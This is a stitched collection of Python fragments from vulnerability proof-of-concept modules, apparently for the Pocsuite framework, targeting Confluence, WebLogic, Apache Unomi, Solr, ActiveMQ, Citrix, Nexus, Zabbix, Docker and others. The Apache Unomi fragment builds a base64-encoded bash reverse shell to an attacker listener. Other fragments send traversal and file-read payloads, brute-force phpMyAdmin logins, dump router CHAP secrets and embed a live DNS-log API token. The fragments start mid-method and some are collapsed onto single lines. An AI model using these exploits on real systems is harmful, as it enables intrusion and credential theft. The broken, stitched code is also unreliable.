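# Tail of a verify method whose header lies outside this fragment.
target_url = vul_url
if self.is_vulnerable():
    result['VerifyInfo'] = {}
    result['VerifyInfo']['URL'] = target_url
# Single exit point: an empty ``result`` makes save_output() report a failure,
# so the duplicated return inside the branch was redundant.
return self.save_output(result)


def is_vulnerable(self):
    """Return whether the target is considered vulnerable.

    NOTE(review): this is still a TODO stub that unconditionally returns
    True, so every scanned target is reported as vulnerable (a guaranteed
    false positive) until the real check is implemented.
    """
    # TODO: implement the actual check
    return True


# Attack module
def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


# Output report
def save_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Register the PoC classes
register_poc(Confluence_3396_POC)
register_poc(Confluence_3398_POC)
# register_poc(Confluence_3394_POC)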
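# Tail of a request-headers dict whose opening lies outside this fragment.
'Cookie': "sidebar_collapsed=false",
'Connection': "close",
'Upgrade-Insecure-Requests': "1",
'Content-Type': "text/xml",
# NOTE(review): a fixed Content-Length is sent regardless of the real size of
# ``payload``; requests computes the header itself, so this override is fragile.
'Content-Length': "1001",
'cache-control': "no-cache"
}
try:
    requests.post(veri_url, data=payload, headers=headers)
    # NOTE(review): a DNS-log API token is hard-coded here; it ships with the
    # source and should be loaded from configuration instead.
    res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
    # The target is only flagged when the DNS-log records echo back ``cmd``.
    if cmd in res.text:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = veri_url
        result['VerifyInfo']['Payload'] = payload
except Exception as e:
    # Logger.warn() is a deprecated alias; warning() is the supported name.
    logger.warning(str(e))
return self.parse_output(result)


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('target is not vulnerable')
    return output


register_poc(WebLogicWlsAsyncRCE)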
PORT = get_listener_port() # IP = yourlistenerip # PORT = yourlistenerport payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1' payload = 'bash -c {echo,' + (base64.b64encode( payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}' pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}' try: r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False) #执行ping指令 except Exception as e: logger.warn(str(e)) return self.parse_attack(result) #自定义输出函数,调用框架输出的实例Output def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail("not vulnerability") return output #注册PoC类,这样框架才知道这是PoC类 register_poc(ApacheUnomiCVE202013942POC1)
result['VerifyInfo']['URL'] = url #result['VerifyInfo']['POC'] = path except Exception as e: return return self.parse_output(result) def _attack(self): return self._verify() def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _shell(self): return def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(testPOC)
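# Tail of a verify method's try-block whose header lies outside this fragment.
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['body'] = data
except Exception:
    # Previously a bare ``return`` handed None back to the caller; fall
    # through instead so an Output object is always produced (an empty
    # ``result`` is reported as "not vulnerable").
    pass
return self.parse_output(result)


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


def parse_attack(self, result):
    """Wrap an attack ``result``; identical to parse_output(), so delegate."""
    return self.parse_output(result)


def _shell(self):
    """Shell stage; not implemented for this PoC (returns None)."""
    return


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('target is not vulnerable')
    return output


register_poc(POC)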
# Tail of the _headers helper whose opening lies outside this fragment.
}
return headers


def _verify(self):
    """Probe the target and wrap the verdict in an Output object.

    Requests ``self._get_url`` joined with a fixed path and treats a body
    that contains 'Dashboard' as the indicator; any exception is logged and
    reported as "not vulnerable".
    """
    finding = {}
    # Hex-escaped literal kept byte-for-byte; it decodes to
    # "/zabbix/zabbix.php?action=dashboard.view&dashboardid=1".  The
    # escaping only hides the request path from review, it changes nothing
    # at runtime.
    payload = '\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31'
    try:
        full_url = self._get_url + payload
        resp = requests.get(url=full_url, headers=self._headers)
        if 'Dashboard' in resp.text:
            finding['VerifyInfo'] = {
                'URL': self.url,
                'Payload': payload,
            }
    except Exception as exc:
        logger.info(exc)
    return self.parse_output(finding)


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object (success when non-empty)."""
    output = Output(self)
    if not result:
        output.fail('Not vulnerability')
        return output
    output.success(result)
    return output


register_poc(Zabbix)
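def test_dnslog(self, url):
    """Query the DNS-log service at ``url`` and report whether a record
    carrying ``self.BANNER`` has arrived.

    Returns:
        True when the first record's ``name`` contains the banner, False
        otherwise.  Decoding the JSON now happens inside the try, so a
        non-JSON reply or an unexpected layout yields False instead of
        raising; the former implicit None on a non-match is an explicit
        False.
    """
    resp = req.get(url)
    try:
        d = resp.json()
        name = d['data'][0]['name']
        return self.BANNER in name
    except Exception:
        return False


# Attack module
def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


# Output report
def save_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Register the PoC classes
register_poc(Solr_RCE_0193)
register_poc(Solr_RCE_0192)
register_poc(Solr_RCE_17558)
register_poc(Solr_RCE_12409)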
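def test_dnslog(self, url):
    """Query the DNS-log service at ``url`` and report whether a record
    carrying ``self.BANNER`` has arrived.

    Returns:
        True when the first record's ``domain`` contains the banner, False
        otherwise.  Decoding the JSON now happens inside the try, so a
        non-JSON reply or an unexpected layout yields False instead of
        raising; the former implicit None on a non-match is an explicit
        False.
    """
    resp = req.get(url)
    try:
        d = resp.json()
        sub_domain = d['data'][0]['domain']
        return self.BANNER in sub_domain
    except Exception:
        return False


def test_command(self, p_output):
    """Return a truthy value when ``p_output`` shows the command ran.

    Matches the echo of the ``echo`` command (Windows) or the ``id`` command
    (*nix) respectively; the return value is the regex Match or a bool, so
    callers should test it for truthiness only.
    """
    return re.search(self.BANNER, p_output) or "uid=" in p_output


# Attack module
def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


# Output report
def save_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Register the PoC class
register_poc(Solr_RCE_12409)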
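# Tail of the POC_1 probe whose header lies outside this fragment.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
response = requests.get(url=vuln_url, headers=headers)
# The digest is md5("1"); a 200 reply that echoes it is taken as the indicator.
if response.status_code == 200 and "c4ca4238a0b923820dcc509a6f75849b" in response.text:
    result['VerifyInfo'] = {}
    result['VerifyInfo']['Path'] = vuln_url
    return self.parse_output(result)
else:
    return self.parse_output()


def _verify(self):
    """Verification stage; runs the single probe POC_1()."""
    return self.POC_1()


def _attack(self):
    """Exploit stage; identical to verification for this PoC."""
    return self.POC_1()


def parse_output(self, result=None):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict describing the finding.  ``None`` (the default) or an
            empty dict means nothing was found.  The former mutable ``{}``
            default is replaced by None so no dict is shared across calls.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    # A non-empty dict is truthy, so the extra len(result.keys()) test was
    # redundant.
    if result:
        output.success(result)
    else:
        output.fail('target is not vulnerable')
    return output


register_poc(DemoPoc)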
# Class attributes (the class header lies outside this fragment).
vulType = 'Unauthrized Access'  # sic: user-visible label kept as written
desc = '''
Docker Remote API Unauthrized Access
'''


def _verify(self):
    """Request ``<url>/info`` and wrap the verdict in an Output object.

    Any 200 reply with a non-empty body counts as a hit.  NOTE(review): that
    is a weak indicator — any HTTP service exposing an /info path would
    match; checking for Docker-specific fields in the body would cut false
    positives.  Exceptions are logged and reported as "not vulnerable".
    """
    finding = {}
    try:
        info_url = self.url + "/info"
        resp = requests.get(info_url)
        if resp.status_code == 200 and resp.text:
            finding['VerifyInfo'] = {
                'URL': info_url,
                'Payload': info_url,
            }
    except Exception as exc:
        logger.info(exc)
    return self.parse_ouput(finding)


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


# Name kept as spelled (sic) because _verify() and possibly callers use it.
def parse_ouput(self, result):
    """Wrap ``result`` in the framework's Output object (success when non-empty)."""
    output = Output(self)
    if not result:
        output.fail('not docker vulnerability')
        return output
    output.success(result)
    return output


register_poc(Docker)
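# Tail of a verify method's try-block whose header lies outside this fragment.
t = resq.text
t = t.replace('\n', '').replace('\r', '')
print('output >>> ' + t)
t = t.replace(" ", "")
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Name'] = t
except Exception:
    # Previously a bare ``return`` handed None back to the caller; fall
    # through instead so an Output object is always produced.
    pass
# This return was missing altogether: the method ended after the try/except
# and returned None even on success, so ``result`` was never wrapped.
return self.parse_output(result)


def parse_attack(self, result):
    """Wrap an attack ``result``; identical to parse_output(), so delegate."""
    return self.parse_output(result)


def _shell(self):
    """Shell stage; not implemented for this PoC (returns None)."""
    return


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('target is not vulnerable')
    return output


register_poc(rj_get_token)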
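# Tail of a verify method whose header lies outside this fragment.
try:
    resq = requests.get(url=url + payload)
    t = resq.text
    # Newlines were replaced with the letter 't' (``replace('\n', 't')``),
    # which looks like a typo for the empty string used by the sibling
    # ``\r`` replacement and corrupts the captured content; fixed here.
    t = t.replace('\n', '').replace('\r', '')
    # "Output file content >>> "
    print('输出文件内容 >>> ' + t)
    t = t.replace(" ", "")
    result['VerifyInfo'] = {}
    result['VerifyInfo']['URL'] = url
    result['VerifyInfo']['Name'] = t
except Exception:
    # Previously a bare ``return`` handed None back to the caller; fall
    # through instead so an Output object is always produced.
    pass
# This return was missing altogether: the method ended after the try/except
# and returned None even on success, so ``result`` was never wrapped.
return self.parse_output(result)


def parse_attack(self, result):
    """Wrap an attack ``result``; identical to parse_output(), so delegate."""
    return self.parse_output(result)


def _shell(self):
    """Shell stage; not implemented for this PoC (returns None)."""
    return


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('target is not vulnerable')
    return output


register_poc(OpenSNSPOC)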
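# Tail of a verify method whose header lies outside this fragment.
try:
    r2 = requests.post(url=pocurl, headers=headers, data=pocxml, verify=False)
    # A 200 reply mentioning XML-RPC is taken as the indicator; the whole
    # body is kept as evidence.
    if r2.status_code == 200 and 'XML-RPC' in r2.text:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
        result['extra'] = {}
        result['extra']['evidence'] = r2.text
except Exception as e:
    # Logger.warn() is a deprecated alias; warning() is the supported name.
    logger.warning(str(e))
return self.parse_attack(result)


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


def _shell(self):
    """Shell stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


def parse_attack(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail("not vulnerability")
    return output


register_poc(ApacheOFBizCVE20209496POC)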
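# Tail of a verify method's try-block whose header lies outside this fragment.
# re.search() returns None when nothing matches; the former unconditional
# .group() then raised AttributeError into the except below.  Test the match
# explicitly instead.
m = re.search(r'server_cond=[\S\s]+?[\S\s]"', t)
if m:
    content = m.group()
    print('output >>> ' + content)
    t = t.replace(" ", "")
    result['VerifyInfo'] = {}
    result['VerifyInfo']['URL'] = url
    # NOTE(review): the whole stripped body is recorded, not the matched
    # ``content``; kept as is since the intent is not clear from here.
    result['VerifyInfo']['Name'] = t
except Exception:
    # Previously a bare ``return`` handed None back to the caller; fall
    # through instead so an Output object is always produced.
    pass
# This return was missing altogether: the method ended after the try/except
# and returned None even on success, so ``result`` was never wrapped.
return self.parse_output(result)


def parse_attack(self, result):
    """Wrap an attack ``result``; identical to parse_output(), so delegate."""
    return self.parse_output(result)


def _shell(self):
    """Shell stage; not implemented for this PoC (returns None)."""
    return


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('target is not vulnerable')
    return output


register_poc(ZhongQingPOC)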
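# Tail of a verify method's try-block whose header (and the socket ``s``)
# lies outside this fragment.
filename = self.random_str(6)
flag = "PUT /fileserver/sex../../..\\styles/%s.txt HTTP/1.0\r\nContent-Length: 9\r\n\r\nbig04dream\r\n\r\n" % (filename)
try:
    s.send(flag.encode())
    s.recv(1024)
finally:
    # Close the raw socket even when send/recv raises so it is not leaked
    # into the outer except handler.
    s.close()
url = 'http://' + ip + ":" + str(port) + '/styles/%s.txt' % (filename)
res_html = requests.get(url).text
# The marker written by the PUT request being served back is the indicator.
if 'big04dream' in res_html:
    result["VerifyInfo"] = {}
    result['VerifyInfo']['IP'] = ip
    result['VerifyInfo']['Payload'] = flag
except Exception as e:
    logger.info(e)
return self.parse_output(result)


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('not activemq vulnerability')
    return output


register_poc(ActiveMQ)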
# Leftover debug printing, kept commented out as in the original:
# if zonetransfers:
#     print("\tZone transfers possible:")
#     for zone in zonetransfers:
#         print(zone)


def _verify(self):
    """Try a DNS zone transfer against the URL's host and wrap the verdict.

    The host name is taken from ``self.url``; ``self.dns_zonetransfer`` does
    the actual query and any truthy return marks the target as vulnerable.
    """
    finding = {}
    parsed = urlparse(self.url)
    host = '{}'.format(parsed.hostname)
    # logger.info(host)
    transfer_info = self.dns_zonetransfer(host)
    if transfer_info:
        finding['VerifyInfo'] = {'URL': '{}'.format(parsed.hostname)}
    return self.parse_output(finding)


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object (success when non-empty)."""
    output = Output(self)
    if not result:
        output.fail('not vulnerability')
        return output
    output.success(result)
    return output


register_poc(DNSPOC)
# print(url) try: res = self.safe_atk(base_url, True) # print(res) if res['chapsecrets'][0] == "OK": f = open("/tmp/res.json", 'a+') json.dump(res, f, indent=4, ensure_ascii=False) f.close() logger.info("Result saved in res.json") result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = base_url result['VerifyInfo']['SavePath'] = "/tmp/res.json" except Exception as ex: logger.error(str(ex)) return self.parse_output(result) def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(VigorPOC)
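def _verify(self):
    """Try each credential pair from ``self.get_word_list()`` against the
    target's login and wrap the verdict in an Output object.

    The first pair accepted by ``self.pma_login`` is recorded; any exception
    is logged and reported as "not vulnerable".
    """
    result = {}
    # print(self.url)
    url = self.url
    # print(url)
    try:
        for username, password in self.get_word_list():
            if self.pma_login(url, username.strip(), password.strip()):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Username'] = username.strip()
                result['VerifyInfo']['Password'] = password.strip()
                # Stop at the first valid pair: the loop previously kept
                # hitting the login endpoint after success and overwrote the
                # finding with whatever pair happened to succeed last.
                break
    except Exception as ex:
        logger.error(str(ex))
    return self.parse_output(result)


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('target is not vulnerable')
    return output


register_poc(PmaBurstPOC)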
# Class attribute (the class header lies outside this fragment).
category = POC_CATEGORY.PROTOCOL.HTTP


def _verify(self):
    """Fetch ``self.url`` and report it as a hit unless it answers 404.

    TLS verification is disabled and a 5 s timeout is applied; the status
    code is recorded as the "PoC" field.  Exceptions are logged and
    reported as "not vulnerable".
    """
    finding = {}
    # print(self.url)
    target = self.url
    # print(target)
    try:
        resp = requests.get(target, verify=False, timeout=5)
        if resp.status_code != 404:
            finding['VerifyInfo'] = {
                'URL': target,
                'PoC': str(resp.status_code),
            }
    except Exception as exc:
        logger.error(str(exc))
    return self.parse_output(finding)


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object (success when non-empty)."""
    output = Output(self)
    if not result:
        output.fail('target is not vulnerable')
        return output
    output.success(result)
    return output


register_poc(HTTPXPOC)
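# Tail of a heartbeat helper whose header lies outside this fragment.
break
local_socket.send(self.malformed_heartbeat)
return self.send_n_catch_heartbeat(local_socket)


def _verify(self):
    """Check the target for the heartbeat bug and wrap the verdict in Output.

    The host is taken from ``self.url``; the URL's explicit port is used when
    present, otherwise 443.  Exceptions are logged and reported as "not
    vulnerable".
    """
    from urllib.parse import urlparse

    result = {}
    try:
        # urlparse() yields the bare host name and separates the port; the
        # former ``self.url.split('//')[1]`` left any path, query or ":port"
        # attached to the host and always forced port 443.
        parsed = urlparse(self.url)
        host = parsed.hostname
        port = parsed.port or 443
        if self.check_heardbeat(host=host.encode(), port=port):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = host
            result['VerifyInfo']['INFO'] = 'target %s vulnerability' % host
    except Exception as e:
        logger.info(e)
    return self.parse_output(result)


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('not heartbleed vulnerability')
    return output


register_poc(HeartBleed)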
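def _verify(self):
    """Request the fixed path below ``self.url`` and report a hit unless it
    answers 404; the verdict is wrapped in an Output object.

    Exceptions are logged and reported as "not vulnerable".
    """
    result = {}
    payload = 'ws_utc/resources/setting/options/general'
    try:
        # endswith() instead of ``self.url[-1]`` so an empty URL does not
        # raise IndexError before the request is even attempted.
        if self.url.endswith('/'):
            url = self.url + payload
        else:
            url = self.url + '/' + payload
        response = requests.get(url=url, headers=self._headers)
        if response.status_code != 404:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = payload
    except Exception as e:
        logger.info(e)
    return self.parse_output(result)


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('target is not vulnerable')
    return output


register_poc(Weblogic)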
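# Tail of a verify method's try-block whose header lies outside this fragment.
cmd2 = 'ping ' + cmd
if self.upload_xml(cmd):
    xml_url = self.url + '/vpn/../vpns/portal/%s.xml' % 'bigdream'
    headers = {"NSC_USER": "******", "NSC_NONCE": "nsroot"}
    r = requests.get(xml_url, headers=headers, verify=False)
    if r.status_code == 200:
        # NOTE(review): a DNS-log API token is hard-coded here; it ships
        # with the source and should be loaded from configuration instead.
        res = requests.get(
            'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
        )
        # Bug fix: ``cmd in res`` tested membership against the Response
        # object, which iterates raw byte chunks, so a str could never
        # match.  The records are in the response body.
        if cmd in res.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = cmd2
except Exception as e:
    # Record the failure instead of silently discarding it (was ``pass``).
    import logging
    logging.getLogger(__name__).debug("verification failed: %s", e)
return self.parse_output(result)


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('not vulnerability')
    return output


register_poc(Citrix)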
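# Tail of an auth-headers helper whose header lies outside this fragment.
return _l_auth_headers


# Verify that the EL expression was evaluated.
def test_EL(self, p_resp):
    """Return True when ``self.ran_sum`` appears in the ``roles`` error field
    of the JSON reply ``p_resp``, False otherwise.

    JSON decoding and the key lookups now sit inside the try, so an
    unexpected body yields False instead of raising; the former implicit
    None on a non-match is an explicit False.
    """
    try:
        d = p_resp.json()
        result = d['result']['errors']['roles']
        logger.info(result)
        return str(self.ran_sum) in result
    except Exception:
        return False


# Attack module
def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


# Output report
def save_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


register_poc(Nexus3_2020_10204_EL_INJECTION_POC)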
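# Tail of a verify method whose header lies outside this fragment.
# ``except Exception`` instead of a bare ``except`` so KeyboardInterrupt and
# SystemExit still propagate instead of being swallowed.
except Exception:
    pass
return self.parse_output(result)


@property
def _headers(self):
    """Request headers used by the probe: a browser-like UA, JSON content
    type and a close-after-reply connection."""
    headers = {
        'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0",
        'Accept': "*/*",
        'Content-Type': "application/json",
        'X-Requested-With': "XMLHttpRequest",
        'Connection': "close",
        'Cache-Control': "no-cache"
    }
    return headers


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('not vulnerability')
    return output


register_poc(Nexus)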
# Tail of a verify method whose header lies outside this fragment.
# NOTE(review): a hit is only printed; nothing is stored in a result dict
# or passed to Output, so the framework never records the finding.
match_string = "Unknown column 'watch_dog' in 'field list'"
if url_parse.query:
    qs = parse_qs(url_parse.query)
    for param in qs:
        # Turn ``param`` into an array parameter carrying the probe, then
        # re-attach every other parameter with its first value, in order.
        parts = [param + '[]' + '=' + 'bind' + '&' + param + '[]' + '=' + payload]
        parts.extend(other + '=' + qs[other][0] for other in qs if other != param)
        query = '&'.join(parts)
        url = url_parse.scheme + '://' + url_parse.netloc + url_parse.path + url_parse.params + '?' + query
        try:
            req = requests.get(url)
            if match_string in req.text:
                print(req.text)
                print("success")
        except Exception as e:
            pass


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


register_poc(Testpoc)
# Class attributes (the class header lies outside this fragment).
appPowerLink = ''
appName = 'php-fpm and nginx'
appVersion = 'all'
vulType = 'rce'
desc = '''
PHP-fpm 远程代码执行漏洞(CVE-2019-11043)
'''
samples = ['']
install_requires = ['']


def _verify(self):
    """Run the PhpUip check against ``<url>/index.php`` and wrap the verdict.

    ``PhpUip.poc()`` decides; a truthy return records ``self.url`` as the hit.
    """
    finding = {}
    checker = PhpUip(self.url + '/index.php')
    if checker.poc():
        finding['VerifyInfo'] = {'URL': self.url}
    return self.parse_output(finding)


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object (success when non-empty)."""
    output = Output(self)
    if not result:
        output.fail('Not vulnerability')
        return output
    output.success(result)
    return output


register_poc(PHPFPM)
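# Tail of a request-headers dict and verify method whose header lies outside
# this fragment (``paylaod`` — sic — and ``limitSize`` are defined there).
"Referer": self.url + "/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
"Content-Type": "application/json; charset=utf-8"
}
data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
r = requests.post(paylaod, data=data, headers=headers)
if r.status_code == 200 and "</web-app>" in r.text:
    # Raw string: the former non-raw literal relied on "\s" and "\/" being
    # invalid escapes that Python keeps verbatim (and warns about); the
    # pattern bytes are unchanged.
    m = re.search(r'<web-app[\s\S]+<\/web-app>', r.text)
    if m:
        content = m.group()[:limitSize]
        result['FileInfo'] = {}
        result['FileInfo']['Filename'] = filename
        result['FileInfo']['Content'] = content
return self.parse_output(result)


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('target is not vulnerable')
    return output


register_poc(DemoPOC)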
str_resp_json = str(resp.json()) # 响应头为200 且json响应字符串包含columns和user,则认为查询成功 if resp.status_code == 200 and 'columns' in str_resp_json and 'user' in str_resp_json: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = target_url return self.save_output(result) return self.save_output(result) except Exception as e: print(e) traceback.print_stack() return self.save_output(result) #漏洞攻击 def _attack(self): return self._verify() def save_output(self, result): #判断有无结果并输出 output = Output(self) if result: output.success(result) else: output.fail() return output register_poc(InfluxDB_POC)
# Tail of a verify method whose header lies outside this fragment.
parsed = urlparse(self.url)
# An explicit port in the URL wins; otherwise try the three defaults.
candidate_ports = [parsed.port] if parsed.port else [7001, 17001, 27001]
for candidate in candidate_ports:
    uri = "{0}://{1}:{2}".format(parsed.scheme, parsed.hostname, str(candidate))
    status, msg = check(parsed.hostname, candidate)
    if not status:
        continue
    result['VerifyInfo'] = {'URL': uri}
    result['extra'] = {'evidence': msg}
    break
return self.parse_output(result)


def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


def parse_output(self, result):
    """Wrap ``result`` in the framework's Output object (success when non-empty)."""
    output = Output(self)
    if not result:
        output.fail('not vulnerability')
        return output
    output.success(result)
    return output


register_poc(TestPOC)
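# Tail of an auth-headers helper whose header lies outside this fragment.
headers = {'Authorization': 'Basic' + ' ' + auth}
return headers


# Verify that the EL expression was evaluated.
def test_EL(self, p_resp):
    """Return True when ``self.ran_sum`` appears in the ``roles`` error field
    of the JSON reply ``p_resp``, False otherwise.

    JSON decoding and the key lookups now sit inside the try, so an
    unexpected body yields False instead of raising; the former implicit
    None on a non-match is an explicit False.  The debug prints are kept.
    """
    try:
        d = p_resp.json()
        result = d['result']['errors']['roles']
        print(result)
        print(self.ran_sum)
        return str(self.ran_sum) in result
    except Exception:
        return False


# Attack module
def _attack(self):
    """Exploit stage; this PoC has none of its own, so delegate to _verify()."""
    return self._verify()


# Output report
def save_output(self, result):
    """Wrap ``result`` in the framework's Output object.

    Args:
        result: dict filled by _verify(); empty when nothing was found.

    Returns:
        Output marked as success (carrying ``result``) or as fail.
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


register_poc(Nexus3_2018_16621_EL_INJECTION_POC)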